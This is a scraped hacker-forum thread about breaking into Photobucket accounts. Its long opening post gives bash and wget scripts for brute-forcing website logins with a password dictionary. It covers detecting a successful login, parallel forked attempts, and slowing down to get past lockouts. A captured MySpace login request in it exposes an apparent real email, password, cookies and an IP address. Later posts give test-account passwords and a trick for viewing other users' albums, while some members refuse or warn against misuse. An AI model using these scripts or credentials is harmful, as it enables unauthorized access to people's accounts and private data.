matt

I want to hack my photobucket

88 posts in this topic

Wow, what a mess. Uhm.. Try not to respond to trolls next time. Sure they block your path to the bridge, but you can walk around em.

About the original question, which the original poster may never come back to read...

I've never learned to use brutus, but it seems complicated. Maybe someday it'll be worth learning. I can show you how to make a simple brute forcer in a shell script, though. Mighty powerful is wget.

First you find out the POST-DATA for the login form. You can read the html for the forms and patch it together, open a packet sniffer which will provide a very nice little line: ie, myspace:

POST /index.cfm?fuseaction=login.process&MyToken=50e6344b-f9e0-45f0-8564-c5d19839e2d1 HTTP/1.1

Host: login.myspace.com

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer: http://www.myspace.com/

Cookie: RBLOCKCNT=0; TIMEZONE=2; DERDB=ZG9tYWluPXlhaG9vJnRsZD1jb20mc21va2VyPS0xJnNleHByZWY9MSZ1dHlwZT0yJnJlbGlnaW9uaWQ9MyZyZWdpb249JnBvc3RhbGNvZGU9NTUzNjMmbWFyaXRhbHN0YXR1cz1SJmluY29tZWlkPTAmaGVpZ2h0PTE4MCZnZW5kZXI9TSZmcmll

bmRzPTEmZXRobmljaWQ9LTEmYWdlPTE4JmJvZHl0eXBlaWQ9LTEmY2hpbGRyZW5pZD0xJmNvdW50cnk9VVMmZGF0aW5nPTAmZHJpbmtlcj0xJmVkdWNhdGlvbmlkPTYmcnNpX3dhbnQ9MA==; AUTOSONGPLAY=0; MSCOUNTRY=US; MSCulture=IP=134.84.95.243&IPCulture=en-US&PreferredCulture=en-US&Country=US; MYSPACE=myspace; NGUserID=a282558-5104-1163031108-1; __utmz=102220221.1163038267.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=102220221.1787020356.1163038267.1163038267.1163077363.2; __utmb=102220221; __utmc=102220221

Content-Type: application/x-www-form-urlencoded

Content-Length: 156

email=tetsu2051%40yahoo.com&password=godlovessexnmoney&ctl00%24Main%24SplashDisplay%24login%24loginbutton.x=24&ctl00%24Main%24SplashDisplay%24login%24loginbutton.y=9

here is the client side communication to the myspace server. the post-data, specifically, is the "email=tetsu2051%40yahoo.com&password=godlovessexnmoney&ctl00%24Main%24SplashDisplay%24login%24loginbutton.x=24&ctl00%24Main%24SplashDisplay%24login%24loginbutton.y=9"

you can use post-data and actually log into myspace or any other authenticated system with wget by using the option --post-data. in this case, it would be

wget --post-data="email=tetsu2051%40yahoo.com&password=godlovessexnmoney&ctl00%24Main%24SplashDisplay%24login%24loginbutton.x=24&ctl00%24Main%24SplashDisplay%24login%24loginbutton.y=9" "http://www.myspace.com/index.cfm?fuseaction=login.process&MyToken=50e6344b-f9e0-45f0-8564-c5d19839e2d1"

you should notice the password field obvious in the post-data, ...&password=SOMEPASSWORD&...

There also seems to be a login session or 'token' here, so you might have to wget a login page first and grep for this MyToken variable. If this isnt the case, the following will work.

make a file with passwords to try, and put it in a file, like dictionary.txt

make a loop that will loop through the wget command, substituting your password for the attempting password.

for PASS in `cat dictionary.txt`; do

wget --post-data="email=tetsu2051%40yahoo.com&password=$PASS&ctl00%24Main%24SplashDisplay%24login%24loginbutton.x=24&ctl00%24Main%24SplashDisplay%24login%24loginbutton.y=9" "http://www.myspace.com/index.cfm?fuseaction=login.process&MyToken=50e6344b-f9e0-45f0-8564-c5d19839e2d1"

done

This will attempt to log in with every password. You may want to output the file (-O somefile.html) and grep for html you will get only if logged in properly, and write an conditional statement in the for loop to test if login has been successful. I don't feel like doing this, so here's psuedo code

for PASS in `cat dictionary.txt`; do

wget --post-data="email=tetsu2051%40yahoo.com&password=$PASS&ctl00%24Main%24SplashDisplay%24login%24loginbutton.x=24&ctl00%24Main%24SplashDisplay%24login%24loginbutton.y=9" "http://www.myspace.com/index.cfm?fuseaction=login.process&MyToken=50e6344b-f9e0-45f0-8564-c5d19839e2d1" -O attempt.html

grep "SOME HTML THAT IS ONLY IN LOGIN PAGE" attempt.html && echo $PASS && break;

done

the break will break out of the for loop and procede from done if attempt.html contains the code. In fact, you could pipe wget to grep, and make it a neat (albeit slightly irritating) one-liner

for PASS in `cat dictionary.txt`; do

wget --post-data="...&password=$PASS&..." "http://www.myspace.com/index.cfm?fuseaction=login.process" -O - | grep "SOME HTML THAT IS ONLY IN LOGIN PAGE" attempt.html && echo $PASS && break;

done

If you want more info, you can use some conditional statements inside the for loop. this code will only print out anything if a login is successful. You can use numbered lines and some bash arithmetic if you want. for instance, linenum=`nl dictionary.txt | grep $PASS | awk '{print $1}'`; if [ $[$linenum%10] -eq 0 ]; then echo $PASS; fi; will print out every 10th password. If you wanted to go this route you may even want to numberline your dictionary file and awk the password out.

More importantly, in brute-forcing, time is most important, and every fraction of second you add between sends could be hours of testing. Also be aware of login limits, which most sites use nowadays. You may be able to attempt to brute force it, just very very very slowly, like over the course of a week. Patience is a virtue, of course, if you really want access. If timing is not a problem, you will want to multi-thread, like brutus does.

Multithreading can be accomplished with forks, the & symbol after a command. You do not want to start all of them at once. The site will immediately notice. It's almost akin to a DDoS, which no one likes, and is totally obvious.

A simple, off the top of my head idea would be to use a simple sleep in a while loop. I know it's not very awesome, but it works if I'm pressed for time.

(I'll use a read while loop here instead, its easier. )

test() {

wget --post-data="...&password=$1&..." "http://somesite.com/login.cfm" | grep "SOME HTML" && echo $1 >> worked.txt

}

while read a;

test $a &

read a; test $a &

read a; test $a &

read a; test $a &

sleep 5; # should test this experimentally, try 5 logins at once and use time or something to test it

done < dictionary.txt

This is as complicated as I've ever gotten, if anyone has better solutions please fill me in!

(none of this code has been tested.)

0

Share this post


Link to post
Share on other sites

Ok. Ive always wondered how these brute force programs work. I was thinking that I might like to see if I can make one. Not to break into everyone's crap, just to see if I can make one.

Ive set up a test account on photobucket.com to see if I can do it.

Anyone want to help?

Oh and if this is against the rules, and just looks like another "help me hack hotmail" topic then delete it. It's not that big a deal to me. Its just something I wanted to try.

I asked a long time ago how brute force programs work when its online, but I cant find the topic. Yes, I searched.

Anyway, the account username is binrevmatt. (link)

The password is pretty simple. One word, no capital letters or numbers. I'm going to start with that.

Password is waste

Since I don't know who is posting their own information voluntarily, someone created an account for you all to test. Many people are coming here thinking they will get you to hax0r their girlfriends photobucket account and whatnot, the moderators will delete any other account that are mentioned in this thread!

The test account is "binrevtest".

http://s85.photobucket.com/albums/k80/binrevtest/

Here is one image: http://i85.photobucket.com/albums/k80/binrevtest/11b7k86.jpg

11b7k86.jpg

It is a test account to see if photobucket security is reliable to evaluate whether or not its users should feel secure in using it. I do not authorize anyone doing any illegal activity with it, but I do not speak for photobucket and photobucket may not like you messing with their service. I feel like I should be able to test the service for security but this is just my opinion. If you violate their ToS, that is all on you. This account is simply to protect other potentially innocent accounts from being posted in our forums. It is not encouraging anyone to do anything to photobucket.

Remember, hacking is not about destruction! Don't be an asshat!

Pass is blahblah

0

Share this post


Link to post
Share on other sites

i'm guessing this will mean more PM's about PB password retreival and more PB emails for you Canti :P

0

Share this post


Link to post
Share on other sites

i'm guessing this will mean more PM's about PB password retreival and more PB emails for you Canti :P

Probably -_-

Note to every one. No I will not. Period.

I just posted as a proof of concept. The details of this will never be posted in public because of the potential danger it poses to young girls. IE password means access to email which means ease of locating the owner.

SO DO NOT ASK ME FOR DETAILS ON HOW TO DO THIS.

0

Share this post


Link to post
Share on other sites

Also, there have been people in IRC and other places recently trying to SELL this trick to people. I don't know that it is anyone here (I hope not) but just be aware that you should never pay for stuff like this because 1) It might not work and 2) it will usually be fixed quickly and then you have nothing.

Selling information like this is totally against the hacker ethic! Do not support people who do this.

0

Share this post


Link to post
Share on other sites

i'm guessing this will mean more PM's about PB password retreival and more PB emails for you Canti :P

Probably -_-

Note to every one. No I will not. Period.

I just posted as a proof of concept. The details of this will never be posted in public because of the potential danger it poses to young girls. IE password means access to email which means ease of locating the owner.

SO DO NOT ASK ME FOR DETAILS ON HOW TO DO THIS.

I'll try not to ask you on how to do this but (just curious) did you use this?

http://www.binrev.com/forums/index.php?s=&...st&p=217249

0

Share this post


Link to post
Share on other sites

i'm guessing this will mean more PM's about PB password retreival and more PB emails for you Canti :P

Probably -_-

Note to every one. No I will not. Period.

I just posted as a proof of concept. The details of this will never be posted in public because of the potential danger it poses to young girls. IE password means access to email which means ease of locating the owner.

SO DO NOT ASK ME FOR DETAILS ON HOW TO DO THIS.

I'll try not to ask you on how to do this but (just curious) did you use this?

http://www.binrev.com/forums/index.php?s=&...st&p=217249

JtR isn't a new tool and I doubt this was what was used to find this information.

0

Share this post


Link to post
Share on other sites

JtR isn't a new tool and I doubt this was what was used to find this information.

Not really that useful unless you can find the hashed password somehow. If you can, sweet.

0

Share this post


Link to post
Share on other sites

Ok, I'm kinda confused on this

is it that you just want to get your photobucket account

or do you want a brute forcing program

oh well,

here's a way i found out how to view there pictures and/or save them

1) of find a picture from the photo bucket you want to view/save the pictures

2) right click on the picture

3) slide down to property's and click on it

4) copy the image location, it should look like

http://i35.photobucket.com/albums/d168/*us...of_the_picture*

5) paste it into Notepad

6) then take the URL you just pasted and take off the *name of the picture*

Should look like this

http://i35.photobucket.com/albums/d168/*username*/

7) Copy and Paste that into the Address Bar

8) have fun looking at all the pictures

Edited by ansem227
0

Share this post


Link to post
Share on other sites

yeah except that doesn't work if the user has a password, which is like 99% if them.

0

Share this post


Link to post
Share on other sites

WOW! (google)

Why does this topic still exist ?

I think, that maybe bad.

The solution is oldschool.

If anybody is interested in more:

http://www.hackthissite.org

(It's a free Hackground, to try some stuff. Also as: rootthisbox <-- link @ hackthissite)

HaNoCr

:)

Edited by Booter
0

Share this post


Link to post
Share on other sites

.

Edited by %0A
0

Share this post


Link to post
Share on other sites

u know whats crazy? i was just checkin out some folks photobuckets by typing in the usernames (boredom) and all of a sudden i could view everybodys photobucket. each name i put in i could see all of the pics for some reason... it just had login read only at the top of each one. it lasted for a day until it logged itself out.. i just gotta figure out how did i do it. i havent did it since then. can anyone tell me how that could possibly have happened?

0

Share this post


Link to post
Share on other sites
Can anyone hack a photobucket account?

No. Don't ask.

0

Share this post


Link to post
Share on other sites

I can hack them ...

First Gimmie your Username

Then Gimmie Your Password

I'll email you the results ...

:grr:

Wakka Wakka Wakka

0

Share this post


Link to post
Share on other sites
This is a great thing to get going and I would be very interested in this as well. I tried setting something up myself a while back but I still couldn't figure out how to get any of the brute force programs to work. I think I used JackTheRipper.

Are you taking a crack at my name?

0

Share this post


Link to post
Share on other sites
This is a great thing to get going and I would be very interested in this as well. I tried setting something up myself a while back but I still couldn't figure out how to get any of the brute force programs to work. I think I used JackTheRipper.

Are you taking a crack at my name?

n00b :grr:

0

Share this post


Link to post
Share on other sites
This is a great thing to get going and I would be very interested in this as well. I tried setting something up myself a while back but I still couldn't figure out how to get any of the brute force programs to work. I think I used JackTheRipper.

Are you taking a crack at my name?

n00b :grr:

nazi :grr:

0

Share this post


Link to post
Share on other sites
This is a great thing to get going and I would be very interested in this as well. I tried setting something up myself a while back but I still couldn't figure out how to get any of the brute force programs to work. I think I used JackTheRipper.

Are you taking a crack at my name?

n00b :grr:

nazi :grr:

You have violated Godwin's law. You have the right to be ridiculed for ever and ever until the t00bz collapse.

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now